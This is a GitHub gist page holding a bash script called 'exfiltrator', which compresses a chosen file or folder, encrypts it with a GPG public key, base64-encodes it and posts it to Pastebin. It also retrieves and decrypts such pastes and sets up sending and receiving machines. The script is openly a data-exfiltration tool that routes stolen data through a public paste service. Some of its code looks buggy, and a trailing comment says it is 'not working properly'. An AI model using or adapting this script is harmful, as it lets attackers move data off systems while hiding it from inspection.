Last active
April 11, 2022 13:36
-
-
Save andersonbosa/7463de5ad9893d685a27e5a309978088 to your computer and use it in GitHub Desktop.
exfiltrate date using pastebin-wrapper.sh and public key cryptographic.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# -*- coding: utf-8 -*- | |
# LICENSE: fully open-source | |
# AUTHOR: @t4inha < github.com/andersonbosa > | |
# GIST: | |
EXFILTRATOR_KEY="exfiltrator-key" | |
PUBLIC_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.public.key" | |
SECRET_EXFILTRATOR_KEY="${EXFILTRATOR_KEY}.secret.key" | |
GPG_KEYRING="$HOME/.gpg" | |
DEPENDENCIES=(gpg curl) | |
function usage() { | |
cat <<EOF | |
exfiltrator [--help] | |
COMMANDS | |
-c | --create) Create a new SECURE paste to exfiltrate data throght the Pastebin. | |
-r | --restore) Restore a SECURE paste from Pastebin. | |
-v | --verbose) Make it verbose. | |
-h | --help) This help message. | |
SETUP | |
-ss | --setup-server) Setup a server to receive the data. | |
-sc | --setup-client) Setup a client to send the data. | |
EOF | |
} | |
# | |
# generates secret and public GPG key | |
# | |
# @see {@link https://www.misterpki.com/gpg-encrypt/} | |
# @returns {void} | |
function exfiltrator::generate_key() { | |
has_key=$(gpg --list-keys grep $EXFILTRATOR_KEY | grep -Poe $EXFILTRATOR_KEY) | |
if [[ "$has_key" == "$EXFILTRATOR_KEY" ]]; then | |
#gpg: A key for "exfiltrator-key" already exists | |
return 1 | |
fi | |
echo "[INF] Generating your key ... type=rsa4096 permissions=sign,auth,encr expire_in=1m" | |
GENERATED_KEY=$(gpg --quick-gen-key $EXFILTRATOR_KEY rsa4096 sign,auth,encr 1m) | |
KEY_ID="$(echo $GENERATED_KEY | sed '2q;d' - | xargs)" | |
echo "[DONE] $EXFILTRATOR_KEY key generated with id: $KEY_ID" | |
return 0 | |
} | |
# | |
# export given GPG Key by $KEY_ID in $GPG_KEYRING directorie. | |
# | |
# @param {string} $1 - KEY_ID | |
# @returns {void} - | |
function exfiltrator::export_gpg_keys_by_id() { | |
echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY" | |
mkdir -p $GPG_KEYRING | |
gpg --armor --export $EXFILTRATOR_KEY >"${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" | |
gpg --armor --export-secret-keys $EXFILTRATOR_KEY >"${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}" | |
cat <<EOF >>~/.zshrc | |
export EXFILTRATOR_PUBLIC_KEY_FILEPATH="${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" | |
export EXFILTRATOR_SECRET_KEY_FILEPATH="${GPG_KEYRING}/${SECRET_EXFILTRATOR_KEY}" | |
EOF | |
echo "[DONE] Exported keys into $GPG_KEYRING:" | |
ls $GPG_KEYRING | |
} | |
# | |
# Encrypts the input file with the exported public key in $EXFILTRATOR_PUBLIC_KEY_FILEPATH | |
# | |
# @params {string} $1 INPUT_FILE - filepath | |
# @param {string} $2 OUTPUT_FILE - output filepath | |
# @returns {void} - generated a encrypted file with GPG in the format: original_name.gpg. | |
function exfiltrator::encrypt_file() { | |
INPUT_FILE="$1" | |
OUTPUT_FILE="$2" | |
if [[ -z "$OUTPUT_FILE" ]]; then | |
OUTPUT_FILE="${INPUT_FILE}.gpg" | |
fi | |
echo "[INF] Encrypting '$INPUT_FILE' with GPG public key ..." | |
gpg -e -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $INPUT_FILE | |
echo "[DONE] Encrypted to '$OUTPUT_FILE'" | |
file $OUTPUT_FILE | |
return 0 | |
} | |
# | |
# Creates a new item in PasteBin. | |
# Compress the file in tgz, encryprafts with the public key, encodes binary with base64 and sends to PasteBin as text. | |
# | |
# @returns {string} - URL do novo item | |
function exfiltrator::create() { | |
# TAR -> GPG -> B64 -> PASTEBIN | |
INPUT_PATHNAME="$1" | |
TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX) | |
cd $TMP_PATHNAME | |
echo "[INF] Created temporary directory: $TMP_PATHNAME" | |
TAR_FILE="$INPUT_PATHNAME.tgz" | |
echo "[INF] Compressing '$INPUT_PATHNAME' in a tar file '$TAR_FILE'" | |
tar -cz -f $TAR_FILE $INPUT_PATHNAME | |
file $TAR_FILE | |
GPG_FILE="$TAR_FILE.gpg" | |
exfiltrator::encrypt_file $TAR_FILE $GPG_FILE | |
B64_FILE="${GPG_FILE}.b64" | |
cat "$GPG_FILE" | base64 -w0 >$B64_FILE | |
echo "[INF] Encoded '$GPG_FILE' using base64 to '$B64_FILE'" | |
file $B64_FILE | |
echo "[INF] Transmiting '$B64_FILE'..." | |
pastebin "$(cat $B64_FILE)" | |
cd - >/dev/null | |
} | |
# | |
# Restores a Pastebin file. | |
# PASTEBIN -> B64 -> GPG -> TAR | |
# | |
# @params {string} $1 PASTEBIN_KEY - Item id at Pastebin URL | |
function exfiltrator::restore() { | |
PASTEBIN_KEY="$1" | |
GPG_FILE="${PASTEBIN_KEY}.gpg" | |
TAR_FILE="${GPG_FILE}.tgz" | |
TMP_PATHNAME=$(mktemp -d -t exfiltrator.XXXXXXXXXX) | |
cd $TMP_PATHNAME | |
echo "[INF] Created temporary directory: $TMP_PATHNAME" | |
echo "[INF] Recovering exfiltred paste: '$PASTEBIN_KEY'..." | |
pastebin -g $PASTEBIN_KEY | base64 -d >$GPG_FILE | |
echo "[INF] Decrypting $GPG_FILE ..." | |
gpg --output $TAR_FILE --decrypt -f "${GPG_KEYRING}/${PUBLIC_EXFILTRATOR_KEY}" $GPG_FILE | |
echo "[INF] Extraing $TAR_FILE ..." | |
tar -xz -f $TAR_FILE | |
echo "[DONE] Paste recovered in '$TMP_PATHNAME'" | |
ls $TMP_PATHNAME | |
} | |
function exfiltrator::import_gpg_keys_by_id() { | |
echo "[INF] Importing public and secret GPG keys: $EXFILTRATOR_KEY" | |
gpg --import $GPG_KEYRING/$SECRET_EXFILTRATOR_KEY | |
gpg --import $GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY | |
} | |
# | |
# Prepare the server to receive client data that are going be encrypted with public key. | |
# | |
function exfiltrator::setup_server() { | |
echo "[INF] Preparing server ..." | |
KEY_ID=$(exfiltrator::generate_key) | |
if [ $? -eq 1 ]; then | |
echo "[ERR] The key already exists. Please manually remove it before generating a new one. Exiting ..." | |
echo "[TIP] gpg --delete-secret-and-public-keys $EXFILTRATOR_KEY" | |
return 1 | |
fi | |
exfiltrator::export_gpg_keys_by_id $EXFILTRATOR_KEY | |
exfiltrator::import_gpg_keys_by_id $EXFILTRATOR_KEY | |
echo "[INF] Exporting the GPG key: $EXFILTRATOR_KEY" | |
echo "[WRN] Keep your secret key safe! " | |
echo "[INF] In client side use 'exfiltrator --setup-client'. Give your public key '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' to the client." | |
echo "[TIP] Client script to install exfiltrator and setup client: https://gist.github.com/andersonbosa/29616c16e87159b6aad5e354fedcf2c0" | |
echo "[DONE] Complete setup in server to receive data." | |
} | |
# | |
# Prepare the client to send data to the server that you will need asymmetric encryption. | |
# | |
function exfiltrator::setup_client() { | |
mkdir -p $GPG_KEYRING | |
KEY_PATH="$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY" | |
echo "[INF] Paste exfiltrator public key from the server in the following file... openning..." | |
echo "[TIP] Get your public key from '$GPG_KEYRING/$PUBLIC_EXFILTRATOR_KEY' on the server side." | |
sleep 1s | |
nano $KEY_PATH | |
echo "[INF] Exporting exfiltrator public key in .zshrc" | |
cat <<EOF >>~/.zshrc | |
export EXFILTRATOR_PUBLIC_KEY_FILEPATH="$KEY_PATH" | |
EOF | |
source ~/.zshrc | |
gpg --import $KEY_PATH | |
echo "[DONE] Client setuped to send data." | |
} | |
function exfiltrator() { | |
IS_VERBOSE="0" | |
PARAMS="" | |
while (($#)); do | |
case $1 in | |
-ss | --setup-server) | |
exfiltrator::setup_server | |
return 0 | |
;; | |
-sc | --setup-client) | |
exfiltrator::setup_client | |
return 0 | |
;; | |
-c | --create) | |
if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then | |
exfiltrator::create "$2" | |
return 0 | |
else | |
echo "[ERR] Argument for $1 is missing" >&2 | |
return 1 | |
fi | |
;; | |
-r | --restore) | |
if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then | |
exfiltrator::restore "$2" | |
return 0 | |
else | |
echo "[ERR] Argument for $1 is missing. Example: zbFdeRRK" >&2 | |
return 1 | |
fi | |
;; | |
-v | --verbose) | |
IS_VERBOSE="1" | |
shift | |
;; | |
-h | --help) | |
usage | |
return 1 | |
;; | |
-* | --*=) # unsupported flags | |
echo "[ERR] Unsupported flag: $1" >&2 | |
return 1 | |
;; | |
*) # preserve positional arguments | |
PARAMS="$PARAMS $1" | |
shift | |
;; | |
esac | |
done | |
# set positional arguments in their proper place | |
eval set -- "$PARAMS" | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
not working properly